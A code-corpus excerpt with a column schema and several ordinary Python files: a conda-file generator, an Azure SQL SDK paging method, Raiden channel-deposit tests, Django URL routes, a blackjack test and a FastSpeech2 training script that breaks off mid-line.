hexsha
stringlengths 40
40
| size
int64 3
1.03M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
972
| max_stars_repo_name
stringlengths 6
130
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
972
| max_issues_repo_name
stringlengths 6
130
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
116k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
972
| max_forks_repo_name
stringlengths 6
130
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 3
1.03M
| avg_line_length
float64 1.13
941k
| max_line_length
int64 2
941k
| alphanum_fraction
float64 0
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
79e4261b270b2f4b4da8adf6d55060619b3bf568
| 5,664
|
py
|
Python
|
tools/generate_conda_file.py
|
awesome-archive/nlp-2
|
79bc954601642679cf19e3750a1ee0b0f1b66b62
|
[
"MIT"
] | 2
|
2020-01-06T05:44:03.000Z
|
2020-06-15T18:10:09.000Z
|
tools/generate_conda_file.py
|
CharlotteSean/nlp-1
|
79bc954601642679cf19e3750a1ee0b0f1b66b62
|
[
"MIT"
] | null | null | null |
tools/generate_conda_file.py
|
CharlotteSean/nlp-1
|
79bc954601642679cf19e3750a1ee0b0f1b66b62
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
# This script creates yaml files to build conda environments
# For generating a conda file for running only python code:
# $ python generate_conda_file.py
#
# For generating a conda file for running python gpu:
# $ python generate_conda_file.py --gpu
import argparse
import textwrap
from sys import platform
HELP_MSG = """
To create the conda environment:
$ conda env create -f {conda_env}.yaml
To update the conda environment:
$ conda env update -f {conda_env}.yaml
To register the conda environment in Jupyter:
$ conda activate {conda_env}
$ python -m ipykernel install --user --name {conda_env} \
--display-name "Python ({conda_env})"
"""
CHANNELS = ["defaults", "conda-forge", "pytorch"]
CONDA_BASE = {
"python": "python==3.6.8",
"pip": "pip>=19.1.1",
"ipykernel": "ipykernel>=4.6.1",
"jupyter": "jupyter>=1.0.0",
"matplotlib": "matplotlib>=2.2.2",
"numpy": "numpy>=1.13.3",
"pandas": "pandas>=0.24.2",
"pytest": "pytest>=3.6.4",
"pytorch": "pytorch-cpu>=1.0.0",
"scipy": "scipy>=1.0.0",
"tensorflow": "tensorflow==1.12.0",
"h5py": "h5py>=2.8.0",
"tensorflow-hub": "tensorflow-hub==0.5.0",
"py-xgboost": "py-xgboost<=0.80",
"dask": "dask[dataframe]==1.2.2",
}
CONDA_GPU = {
"numba": "numba>=0.38.1",
"pytorch": "pytorch>=1.0.0",
"tensorflow": "tensorflow-gpu==1.12.0",
"cudatoolkit": "cudatoolkit==9.2"
}
PIP_BASE = {
"allennlp": "allennlp==0.8.4",
"azureml-sdk[automl]": "azureml-sdk[automl]==1.0.48",
"azureml-train-automl": "azureml-train-automl==1.0.48",
"azureml-dataprep": "azureml-dataprep==1.1.8",
"azureml-widgets": "azureml-widgets==1.0.48",
"azureml-mlflow": "azureml-mlflow>=1.0.43.1",
"black": "black>=18.6b4",
"cached-property": "cached-property==1.5.1",
"papermill": "papermill>=1.0.1",
"nteract-scrapbook": "nteract-scrapbook>=0.2.1",
"pydocumentdb": "pydocumentdb>=2.3.3",
"pytorch-pretrained-bert": "pytorch-pretrained-bert>=0.6",
"tqdm": "tqdm==4.31.1",
"pyemd": "pyemd==0.5.1",
"ipywebrtc": "ipywebrtc==0.4.3",
"pre-commit": "pre-commit>=1.14.4",
"scikit-learn": "scikit-learn>=0.19.0,<=0.20.3",
"setuptools_scm": "setuptools_scm==3.2.0",
"sklearn-crfsuite": "sklearn-crfsuite>=0.3.6",
"spacy": "spacy>=2.1.4",
"spacy-models": (
"https://github.com/explosion/spacy-models/releases/download/"
"en_core_web_sm-2.1.0/en_core_web_sm-2.1.0.tar.gz"
),
"gensim": "gensim>=3.7.0",
"nltk": "nltk>=3.4",
"seqeval": "seqeval>=0.0.12",
}
PIP_GPU = {}
PIP_DARWIN = {}
PIP_DARWIN_GPU = {}
PIP_LINUX = {}
PIP_LINUX_GPU = {}
PIP_WIN32 = {}
PIP_WIN32_GPU = {}
CONDA_DARWIN = {}
CONDA_DARWIN_GPU = {}
CONDA_LINUX = {}
CONDA_LINUX_GPU = {}
CONDA_WIN32 = {}
CONDA_WIN32_GPU = {"pytorch": "pytorch==1.0.0", "cudatoolkit": "cuda90"}
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description=textwrap.dedent(
"""
This script generates a conda file for different environments.
Plain python is the default,
but flags can be used to support GPU functionality."""
),
epilog=HELP_MSG,
formatter_class=argparse.RawDescriptionHelpFormatter,
)
parser.add_argument("--name", help="specify name of conda environment")
parser.add_argument("--gpu", action="store_true", help="include packages for GPU support")
args = parser.parse_args()
# set name for environment and output yaml file
conda_env = "nlp_cpu"
if args.gpu:
conda_env = "nlp_gpu"
# overwrite environment name with user input
if args.name is not None:
conda_env = args.name
# add conda and pip base packages
conda_packages = CONDA_BASE
pip_packages = PIP_BASE
# update conda and pip packages based on flags provided
if args.gpu:
conda_packages.update(CONDA_GPU)
pip_packages.update(PIP_GPU)
# update conda and pip packages based on os platform support
if platform == "darwin":
conda_packages.update(CONDA_DARWIN)
pip_packages.update(PIP_DARWIN)
if args.gpu:
conda_packages.update(CONDA_DARWIN_GPU)
pip_packages.update(PIP_DARWIN_GPU)
elif platform.startswith("linux"):
conda_packages.update(CONDA_LINUX)
pip_packages.update(PIP_LINUX)
if args.gpu:
conda_packages.update(CONDA_LINUX_GPU)
pip_packages.update(PIP_LINUX_GPU)
elif platform == "win32":
conda_packages.update(CONDA_WIN32)
pip_packages.update(PIP_WIN32)
if args.gpu:
conda_packages.update(CONDA_WIN32_GPU)
pip_packages.update(PIP_WIN32_GPU)
else:
raise Exception("Unsupported platform. Must be Windows, Linux, or macOS")
# write out yaml file
conda_file = "{}.yaml".format(conda_env)
with open(conda_file, "w") as f:
for line in HELP_MSG.format(conda_env=conda_env).split("\n"):
f.write("# {}\n".format(line))
f.write("name: {}\n".format(conda_env))
f.write("channels:\n")
for channel in CHANNELS:
f.write("- {}\n".format(channel))
f.write("dependencies:\n")
for conda_package in conda_packages.values():
f.write("- {}\n".format(conda_package))
f.write("- pip:\n")
for pip_package in pip_packages.values():
f.write(" - {}\n".format(pip_package))
print("Generated conda file: {}".format(conda_file))
print(HELP_MSG.format(conda_env=conda_env))
| 31.466667
| 94
| 0.634887
|
ec34c61315c6598602f1ffdc06f206297bf32f3e
| 6,722
|
py
|
Python
|
sdk/sql/azure-mgmt-sql/azure/mgmt/sql/operations/_transparent_data_encryption_activities_operations.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 3
|
2020-06-23T02:25:27.000Z
|
2021-09-07T18:48:11.000Z
|
sdk/sql/azure-mgmt-sql/azure/mgmt/sql/operations/_transparent_data_encryption_activities_operations.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 510
|
2019-07-17T16:11:19.000Z
|
2021-08-02T08:38:32.000Z
|
sdk/sql/azure-mgmt-sql/azure/mgmt/sql/operations/_transparent_data_encryption_activities_operations.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 5
|
2019-09-04T12:51:37.000Z
|
2020-09-16T07:28:40.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.mgmt.core.exceptions import ARMErrorFormat
from .. import models as _models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar, Union
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class TransparentDataEncryptionActivitiesOperations(object):
"""TransparentDataEncryptionActivitiesOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.sql.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list_by_configuration(
self,
resource_group_name, # type: str
server_name, # type: str
database_name, # type: str
transparent_data_encryption_name, # type: Union[str, "_models.TransparentDataEncryptionName"]
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.TransparentDataEncryptionActivityListResult"]
"""Returns a database's transparent data encryption operation result.
:param resource_group_name: The name of the resource group that contains the resource. You can
obtain this value from the Azure Resource Manager API or the portal.
:type resource_group_name: str
:param server_name: The name of the server.
:type server_name: str
:param database_name: The name of the database for which the transparent data encryption
applies.
:type database_name: str
:param transparent_data_encryption_name: The name of the transparent data encryption
configuration.
:type transparent_data_encryption_name: str or ~azure.mgmt.sql.models.TransparentDataEncryptionName
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either TransparentDataEncryptionActivityListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.sql.models.TransparentDataEncryptionActivityListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.TransparentDataEncryptionActivityListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2014-04-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_by_configuration.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'serverName': self._serialize.url("server_name", server_name, 'str'),
'databaseName': self._serialize.url("database_name", database_name, 'str'),
'transparentDataEncryptionName': self._serialize.url("transparent_data_encryption_name", transparent_data_encryption_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('TransparentDataEncryptionActivityListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_by_configuration.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Sql/servers/{serverName}/databases/{databaseName}/transparentDataEncryption/{transparentDataEncryptionName}/operationResults'} # type: ignore
| 50.541353
| 275
| 0.677328
|
35bd7fa805e8dffba1a9697f611b74ef6e403598
| 855
|
py
|
Python
|
trac/Lib/site-packages/docutils-0.9.1-py2.7.egg/EGG-INFO/scripts/rst2latex.py
|
thinkbase/PortableTrac
|
9ea0210f6b88f135ef73f370b48127af0495b2d7
|
[
"BSD-3-Clause"
] | 2
|
2015-08-06T04:19:21.000Z
|
2020-04-29T23:52:10.000Z
|
trac/Lib/site-packages/docutils-0.9.1-py2.7.egg/EGG-INFO/scripts/rst2latex.py
|
thinkbase/PortableTrac
|
9ea0210f6b88f135ef73f370b48127af0495b2d7
|
[
"BSD-3-Clause"
] | null | null | null |
trac/Lib/site-packages/docutils-0.9.1-py2.7.egg/EGG-INFO/scripts/rst2latex.py
|
thinkbase/PortableTrac
|
9ea0210f6b88f135ef73f370b48127af0495b2d7
|
[
"BSD-3-Clause"
] | null | null | null |
#!E:\PortableTrac\Portable Python 2.7.3.1\App\python.exe
# $Id: rst2latex.py 5905 2009-04-16 12:04:49Z milde $
# Author: David Goodger <goodger@python.org>
# Copyright: This module has been placed in the public domain.
"""
A minimal front end to the Docutils Publisher, producing LaTeX.
"""
try:
import locale
locale.setlocale(locale.LC_ALL, '')
except:
pass
from docutils.core import publish_cmdline
description = ('Generates LaTeX documents from standalone reStructuredText '
'sources. '
'Reads from <source> (default is stdin) and writes to '
'<destination> (default is stdout). See '
'<http://docutils.sourceforge.net/docs/user/latex.html> for '
'the full reference.')
publish_cmdline(writer_name='latex', description=description)
| 31.666667
| 77
| 0.653801
|
d915a4cb5b66660b42ea11c330e40d68f99bd71d
| 10,406
|
py
|
Python
|
raiden_contracts/tests/test_channel_deposit.py
|
marcosmartinez7/lumino-contracts
|
700d6cb6b4c90d0173b3d206238fd31a02dcb9bd
|
[
"MIT"
] | 3
|
2019-06-12T14:50:12.000Z
|
2020-12-25T07:25:23.000Z
|
raiden_contracts/tests/test_channel_deposit.py
|
marcosmartinez7/lumino-contracts
|
700d6cb6b4c90d0173b3d206238fd31a02dcb9bd
|
[
"MIT"
] | 2
|
2019-12-08T21:06:56.000Z
|
2021-01-21T02:44:58.000Z
|
raiden_contracts/tests/test_channel_deposit.py
|
marcosmartinez7/lumino-contracts
|
700d6cb6b4c90d0173b3d206238fd31a02dcb9bd
|
[
"MIT"
] | 5
|
2019-06-12T14:02:07.000Z
|
2020-12-10T11:21:37.000Z
|
import pytest
from eth_tester.exceptions import TransactionFailed
from web3.exceptions import ValidationError
from raiden_contracts.constants import TEST_SETTLE_TIMEOUT_MIN, ChannelEvent
from raiden_contracts.tests.fixtures.channel import call_settle
from raiden_contracts.tests.utils import (
EMPTY_ADDITIONAL_HASH,
EMPTY_ADDRESS,
EMPTY_BALANCE_HASH,
EMPTY_SIGNATURE,
FAKE_ADDRESS,
MAX_UINT256,
ChannelValues,
)
from raiden_contracts.utils.events import check_new_deposit
def test_deposit_channel_call(token_network, custom_token, create_channel, get_accounts):
""" Calling setTotalDeposit() fails with various invalid inputs """
(A, B) = get_accounts(2)
deposit_A = 200
channel_identifier = create_channel(A, B)[0]
custom_token.functions.mint(deposit_A).call_and_transact({"from": A})
custom_token.functions.approve(token_network.address, deposit_A).call_and_transact({"from": A})
# Validation failure with an invalid channel identifier
with pytest.raises(ValidationError):
token_network.functions.setTotalDeposit(-1, A, deposit_A, B)
# Validation failure with the empty string instead of a channel identifier
with pytest.raises(ValidationError):
token_network.functions.setTotalDeposit("", A, deposit_A, B)
# Validation failure with a negative number instead of an address
with pytest.raises(ValidationError):
token_network.functions.setTotalDeposit(channel_identifier, -1, A, deposit_A)
# Validation failure with an empty string instead of an address
with pytest.raises(ValidationError):
token_network.functions.setTotalDeposit(channel_identifier, "", deposit_A, B)
# Validation failure with an odd-length string instead of an address
with pytest.raises(ValidationError):
token_network.functions.setTotalDeposit(channel_identifier, FAKE_ADDRESS, deposit_A, B)
# Validation failure with the number zero instead of an address
with pytest.raises(ValidationError):
token_network.functions.setTotalDeposit(channel_identifier, 0x0, deposit_A, B)
# Validation failure with the empty string instead of an address
with pytest.raises(ValidationError):
token_network.functions.setTotalDeposit(channel_identifier, A, deposit_A, "")
# Validation failure with an odd-length string instead of an address
with pytest.raises(ValidationError):
token_network.functions.setTotalDeposit(channel_identifier, A, deposit_A, FAKE_ADDRESS)
# Validation failure with the number zero instead of an address
with pytest.raises(ValidationError):
token_network.functions.setTotalDeposit(channel_identifier, A, deposit_A, 0x0)
# Validation failure with a negative amount of deposit
with pytest.raises(ValidationError):
token_network.functions.setTotalDeposit(channel_identifier, A, -1, B)
# Transaction failure with the zero address
with pytest.raises(TransactionFailed):
token_network.functions.setTotalDeposit(
channel_identifier, EMPTY_ADDRESS, deposit_A, B
).call({"from": A})
# Transaction failure with the zero address
with pytest.raises(TransactionFailed):
token_network.functions.setTotalDeposit(
channel_identifier, A, deposit_A, EMPTY_ADDRESS
).call({"from": A})
# Transaction failure with zero total deposit
with pytest.raises(TransactionFailed):
token_network.functions.setTotalDeposit(channel_identifier, A, 0, B).call({"from": A})
token_network.functions.setTotalDeposit(channel_identifier, A, deposit_A, B)
def test_deposit_notapproved(token_network, custom_token, create_channel, get_accounts, web3):
""" Calling setTotalDeposit() fails without approving transfers on the token contract """
(A, B) = get_accounts(2)
channel_identifier = create_channel(A, B)[0]
deposit_A = 1
custom_token.functions.mint(deposit_A).call_and_transact({"from": A})
web3.testing.mine(1)
balance = custom_token.functions.balanceOf(A).call()
assert balance >= deposit_A, f"minted {deposit_A} but the balance is still {balance}"
with pytest.raises(TransactionFailed):
token_network.functions.setTotalDeposit(channel_identifier, A, deposit_A, B).call(
{"from": A}
)
def test_null_or_negative_deposit_fail(
token_network, create_channel, channel_deposit, assign_tokens, get_accounts
):
""" setTotalDeposit() fails when the total deposit does not increase """
(A, B) = get_accounts(2)
channel_identifier = create_channel(A, B)[0]
channel_deposit(channel_identifier, A, 2, B)
assign_tokens(A, 1)
# setTotalDeposit is idempotent
with pytest.raises(TransactionFailed):
token_network.functions.setTotalDeposit(channel_identifier, A, 2, B).call({"from": A})
with pytest.raises(TransactionFailed):
token_network.functions.setTotalDeposit(channel_identifier, A, 1, B).call({"from": A})
def test_deposit_delegate_works(get_accounts, create_channel, channel_deposit):
""" A third party can successfully call setTokenDeposit() """
(A, B, C) = get_accounts(3)
channel_identifier = create_channel(A, B)[0]
channel_deposit(channel_identifier, A, 2, B, tx_from=C)
def test_deposit_wrong_channel(get_accounts, token_network, create_channel, assign_tokens):
""" setTotalDeposit() with a wrong channelID fails """
(A, B, C) = get_accounts(3)
channel_identifier = create_channel(A, B)[0]
channel_identifier2 = create_channel(A, C)[0]
assign_tokens(A, 10)
with pytest.raises(TransactionFailed):
token_network.functions.setTotalDeposit(channel_identifier2, A, 10, B).call({"from": A})
with pytest.raises(TransactionFailed):
token_network.functions.setTotalDeposit(channel_identifier, A, 10, C).call({"from": A})
token_network.functions.setTotalDeposit(channel_identifier, A, 10, B).call_and_transact(
{"from": A}
)
@pytest.mark.skip("Not necessary with limited deposits for the test release.")
def test_channel_deposit_overflow(get_accounts, create_channel, channel_deposit):
(A, B) = get_accounts(2)
deposit_A = 50
deposit_B_ok = MAX_UINT256 - deposit_A
deposit_B_fail = deposit_B_ok + 1
channel_identifier = create_channel(A, B)[0]
channel_deposit(channel_identifier, A, deposit_A, B)
with pytest.raises(TransactionFailed):
channel_deposit(channel_identifier, B, deposit_B_fail, A)
channel_deposit(channel_identifier, B, deposit_B_ok, A)
def test_deposit_channel_state(token_network, create_channel, channel_deposit, get_accounts):
""" Observe how setTotalDeposit() changes the results of getChannelParticipantInfo() """
(A, B) = get_accounts(2)
deposit_A = 10
deposit_B = 15
channel_identifier = create_channel(A, B)[0]
A_deposit = token_network.functions.getChannelParticipantInfo(channel_identifier, A, B).call()[
0
]
assert A_deposit == 0
B_deposit = token_network.functions.getChannelParticipantInfo(channel_identifier, B, A).call()[
0
]
assert B_deposit == 0
channel_deposit(channel_identifier, A, deposit_A, B)
A_deposit = token_network.functions.getChannelParticipantInfo(channel_identifier, A, B).call()[
0
]
assert A_deposit == deposit_A
B_deposit = token_network.functions.getChannelParticipantInfo(channel_identifier, B, A).call()[
0
]
assert B_deposit == 0
channel_deposit(channel_identifier, B, deposit_B, A)
A_deposit = token_network.functions.getChannelParticipantInfo(channel_identifier, A, B).call()[
0
]
assert A_deposit == deposit_A
B_deposit = token_network.functions.getChannelParticipantInfo(channel_identifier, B, A).call()[
0
]
assert B_deposit == deposit_B
def test_deposit_wrong_state_fail(
web3, get_accounts, token_network, create_channel, assign_tokens
):
""" setTotalDeposit() fails on Closed or Settled channels. """
(A, B) = get_accounts(2)
vals_A = ChannelValues(deposit=2, transferred=0)
vals_B = ChannelValues(deposit=2, transferred=0)
channel_identifier = create_channel(A, B, TEST_SETTLE_TIMEOUT_MIN)[0]
assign_tokens(A, vals_A.deposit)
assign_tokens(B, vals_B.deposit)
token_network.functions.setTotalDeposit(
channel_identifier, A, vals_A.deposit, B
).call_and_transact({"from": A})
token_network.functions.setTotalDeposit(
channel_identifier, B, vals_B.deposit, A
).call_and_transact({"from": B})
token_network.functions.closeChannel(
channel_identifier, B, EMPTY_BALANCE_HASH, 0, EMPTY_ADDITIONAL_HASH, EMPTY_SIGNATURE
).call_and_transact({"from": A})
assign_tokens(A, 10)
assign_tokens(B, 10)
vals_A.deposit += 5
vals_B.deposit += 5
with pytest.raises(TransactionFailed):
token_network.functions.setTotalDeposit(channel_identifier, A, vals_A.deposit, B).call(
{"from": A}
)
with pytest.raises(TransactionFailed):
token_network.functions.setTotalDeposit(channel_identifier, B, vals_B.deposit, A).call(
{"from": B}
)
web3.testing.mine(TEST_SETTLE_TIMEOUT_MIN + 1)
call_settle(token_network, channel_identifier, A, vals_A, B, vals_B)
with pytest.raises(TransactionFailed):
token_network.functions.setTotalDeposit(channel_identifier, A, vals_A.deposit, B).call(
{"from": A}
)
with pytest.raises(TransactionFailed):
token_network.functions.setTotalDeposit(channel_identifier, B, vals_B.deposit, A).call(
{"from": B}
)
def test_deposit_channel_event(
get_accounts, token_network, create_channel, channel_deposit, event_handler
):
""" setTotalDeposit() from each participant causes a DEPOSIT event """
ev_handler = event_handler(token_network)
(A, B) = get_accounts(2)
deposit_A = 10
deposit_B = 15
channel_identifier = create_channel(A, B)[0]
txn_hash = channel_deposit(channel_identifier, A, deposit_A, B)
ev_handler.add(
txn_hash, ChannelEvent.DEPOSIT, check_new_deposit(channel_identifier, A, deposit_A)
)
txn_hash = channel_deposit(channel_identifier, B, deposit_B, A)
ev_handler.add(
txn_hash, ChannelEvent.DEPOSIT, check_new_deposit(channel_identifier, B, deposit_B)
)
ev_handler.check()
| 40.333333
| 99
| 0.729483
|
be3f9dcbafff128209385ef43a17145e5918b3d4
| 780
|
py
|
Python
|
tastypie_swagger/urls.py
|
pierrealixt/django-tastypie-swagger
|
9461803253cd2653f402ec8233606a4cc8c1113f
|
[
"Apache-2.0"
] | null | null | null |
tastypie_swagger/urls.py
|
pierrealixt/django-tastypie-swagger
|
9461803253cd2653f402ec8233606a4cc8c1113f
|
[
"Apache-2.0"
] | null | null | null |
tastypie_swagger/urls.py
|
pierrealixt/django-tastypie-swagger
|
9461803253cd2653f402ec8233606a4cc8c1113f
|
[
"Apache-2.0"
] | 2
|
2017-10-05T22:50:35.000Z
|
2020-07-15T13:07:20.000Z
|
from .views import SwaggerView, ResourcesView, SchemaView
try:
from django.conf.urls import include, url
urlpatterns = [
url(r'^$', SwaggerView.as_view(), name='index'),
url(r'^resources/$', ResourcesView.as_view(), name='resources'),
url(r'^schema/(?P<resource>\S+)$', SchemaView.as_view()),
url(r'^schema/$', SchemaView.as_view(), name='schema'),
]
except ImportError:
from django.conf.urls.defaults import patterns, include, url
urlpatterns = patterns('',
url(r'^$', SwaggerView.as_view(), name='index'),
url(r'^resources/$', ResourcesView.as_view(), name='resources'),
url(r'^schema/(?P<resource>\S+)$', SchemaView.as_view()),
url(r'^schema/$', SchemaView.as_view(), name='schema'),
)
| 37.142857
| 72
| 0.621795
|
a1f7f642e0f102e6d7f2e97e8a5a33cb0e8eba7f
| 777
|
py
|
Python
|
tests/test3.py
|
akaeme/BlackJackBot
|
04970107202a24059f8da933233fba7df9f3a0ef
|
[
"MIT"
] | null | null | null |
tests/test3.py
|
akaeme/BlackJackBot
|
04970107202a24059f8da933233fba7df9f3a0ef
|
[
"MIT"
] | null | null | null |
tests/test3.py
|
akaeme/BlackJackBot
|
04970107202a24059f8da933233fba7df9f3a0ef
|
[
"MIT"
] | null | null | null |
#encoding: utf8
import sys
sys.path.insert(0,"..")
from game import Game
from player import Player
from card import Card
from test_shoe import TestShoe
class TestPlayer(Player):
def __init__(self, name="TestPlayer", money=0, default_bet=1):
super(TestPlayer, self).__init__(name, money)
self.default_bet = default_bet
def play(self, dealer, players):
return "h"
def bet(self, dealer, players):
return self.default_bet
if __name__ == '__main__':
players = [TestPlayer("test",100)]
print(players)
g = Game(players, debug=True, shoe=TestShoe([Card(0,1), Card(0,12), Card(1,1), Card(1,12)] ))
g.run()
print("OVERALL: ", players)
if str(players) == "[test (100€)]":
sys.exit(0)
sys.exit(1)
| 24.28125
| 98
| 0.638353
|
8396e9db010540e847fd1463a4af9684f0f45fc8
| 12,478
|
py
|
Python
|
train.py
|
MckinstryJ/FastSpeech2_LJSpeech
|
bcc45d2804d3859a51de979c24d208cf0142c74e
|
[
"MIT"
] | 5
|
2021-08-28T17:07:10.000Z
|
2022-02-09T15:53:53.000Z
|
train.py
|
MckinstryJ/FastSpeech2_LJSpeech
|
bcc45d2804d3859a51de979c24d208cf0142c74e
|
[
"MIT"
] | null | null | null |
train.py
|
MckinstryJ/FastSpeech2_LJSpeech
|
bcc45d2804d3859a51de979c24d208cf0142c74e
|
[
"MIT"
] | 1
|
2022-02-10T02:01:31.000Z
|
2022-02-10T02:01:31.000Z
|
import torch
import torch.nn as nn
from torch.utils.data import DataLoader
from torch.utils.tensorboard import SummaryWriter
import numpy as np
import argparse
import os
import time
from fastspeech2 import FastSpeech2
from loss import FastSpeech2Loss
from dataset import Dataset
from optimizer import ScheduledOptim
from evaluate import evaluate
import hparams as hp
import utils
import audio as Audio
'''
Notes:
- There are a few packages that have to be installed before train.py can be ran
- Once installed, an PermissionError shows up... will work on it on Sunday
'''
def main(args):
torch.manual_seed(0)
# Get device
device = torch.device('cuda'if torch.cuda.is_available()else 'cpu')
# Get dataset
dataset = Dataset("train.txt")
loader = DataLoader(dataset, batch_size=hp.batch_size**2, shuffle=True,
collate_fn=dataset.collate_fn, drop_last=True, num_workers=0)
# Define model
model = nn.DataParallel(FastSpeech2()).to(device)
print("Model Has Been Defined")
num_param = utils.get_param_num(model)
print('Number of FastSpeech2 Parameters:', num_param)
# Optimizer and loss
optimizer = torch.optim.Adam(model.parameters(), betas=hp.betas, eps=hp.eps, weight_decay = hp.weight_decay)
scheduled_optim = ScheduledOptim(optimizer, hp.decoder_hidden, hp.n_warm_up_step, args.restore_step)
Loss = FastSpeech2Loss().to(device)
print("Optimizer and Loss Function Defined.")
# Load checkpoint if exists
checkpoint_path = os.path.join(hp.checkpoint_path)
try:
checkpoint = torch.load(os.path.join(
checkpoint_path, 'checkpoint_{}.pth.tar'.format(args.restore_step)))
model.load_state_dict(checkpoint['model'])
optimizer.load_state_dict(checkpoint['optimizer'])
print("\n---Model Restored at Step {}---\n".format(args.restore_step))
except:
print("\n---Start New Training---\n")
if not os.path.exists(checkpoint_path):
os.makedirs(checkpoint_path)
# Load vocoder
if hp.vocoder == 'melgan':
melgan = utils.get_melgan()
elif hp.vocoder == 'waveglow':
waveglow = utils.get_waveglow()
# Init logger
log_path = hp.log_path
if not os.path.exists(log_path):
os.makedirs(log_path)
os.makedirs(os.path.join(log_path, 'train'))
os.makedirs(os.path.join(log_path, 'validation'))
train_logger = SummaryWriter(os.path.join(log_path, 'train'))
val_logger = SummaryWriter(os.path.join(log_path, 'validation'))
# Init synthesis directory
synth_path = hp.synth_path
if not os.path.exists(synth_path):
os.makedirs(synth_path)
# Define Some Information
Time = np.array([])
Start = time.perf_counter()
# Training
model = model.train()
for epoch in range(hp.epochs):
# Get Training Loader
total_step = hp.epochs * len(loader) * hp.batch_size
for i, batchs in enumerate(loader):
for j, data_of_batch in enumerate(batchs):
start_time = time.perf_counter()
current_step = i*hp.batch_size + j + args.restore_step + epoch*len(loader)*hp.batch_size + 1
# Get Data
text = torch.from_numpy(data_of_batch["text"]).long().to(device)
mel_target = torch.from_numpy(data_of_batch["mel_target"]).float().to(device)
D = torch.from_numpy(data_of_batch["D"]).long().to(device)
log_D = torch.from_numpy(data_of_batch["log_D"]).float().to(device)
f0 = torch.from_numpy(data_of_batch["f0"]).float().to(device)
energy = torch.from_numpy(data_of_batch["energy"]).float().to(device)
src_len = torch.from_numpy(data_of_batch["src_len"]).long().to(device)
mel_len = torch.from_numpy(data_of_batch["mel_len"]).long().to(device)
max_src_len = np.max(data_of_batch["src_len"]).astype(np.int32)
max_mel_len = np.max(data_of_batch["mel_len"]).astype(np.int32)
# Forward
mel_output, mel_postnet_output, log_duration_output, f0_output, energy_output, src_mask, mel_mask, _ = model(
